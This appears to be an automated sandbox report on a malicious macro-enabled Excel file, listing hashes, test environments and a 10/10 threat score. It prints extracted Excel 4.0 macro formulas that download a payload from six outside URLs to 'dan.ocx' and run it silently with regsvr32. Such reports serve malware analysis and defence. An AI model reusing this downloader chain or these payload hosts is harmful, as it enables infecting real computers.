General
Target: 735604a4576d93b5aab72a9e990506b1eeb80f7dc44a3320ab33bf0c7b7a3313
Size: 40KB
Sample: 241111-zv3j1avqfv
MD5: a76c65d76c17ef921f0dc53e1a29346e
SHA1: 81ebd8e04e101b7deb869b243d2ca8c6e1bf7100
SHA256: 735604a4576d93b5aab72a9e990506b1eeb80f7dc44a3320ab33bf0c7b7a3313
SHA512: c72a1604288baaf4723c51dbdcd82b95668aa8d6f5af1260c96c32f3c06216019e2735dff572dba3733755b456be05ae2b7bcc60414f955e43251d148408f64b
SSDEEP: 768:lqoOomihd8DOevZCwtofyKfcrND59V+L9Rw4eWrXcTqZ0VfIeg:TOom8eDGylND59V4jwmXc2CVfIb
Behavioral task: behavioral1
Sample: 735604a4576d93b5aab72a9e990506b1eeb80f7dc44a3320ab33bf0c7b7a3313.xlsm
Resource: win7-20241010-en
Behavioral task: behavioral2
Sample: 735604a4576d93b5aab72a9e990506b1eeb80f7dc44a3320ab33bf0c7b7a3313.xlsm
Resource: win10v2004-20241007-en
Malware Config
Extracted
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://asempaye.com/404/zREXldL8ZfpsEepiC/","..\dan.ocx",0,0)
=IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://freesoft18.com/urq/dd1s9WyDLkdM/","..\dan.ocx",0,0))
=IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/","..\dan.ocx",0,0))
=IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/","..\dan.ocx",0,0))
=IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://pedroribeiro.work/wp-admin/qOkQQ/","..\dan.ocx",0,0))
=IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://hojeemdia.life/detector/klwHgC9eat/","..\dan.ocx",0,0))
=IF('EFALGV'!D20<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\dan.ocx")
=RETURN()
Targets
Target: 735604a4576d93b5aab72a9e990506b1eeb80f7dc44a3320ab33bf0c7b7a3313
Score: 10/10
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.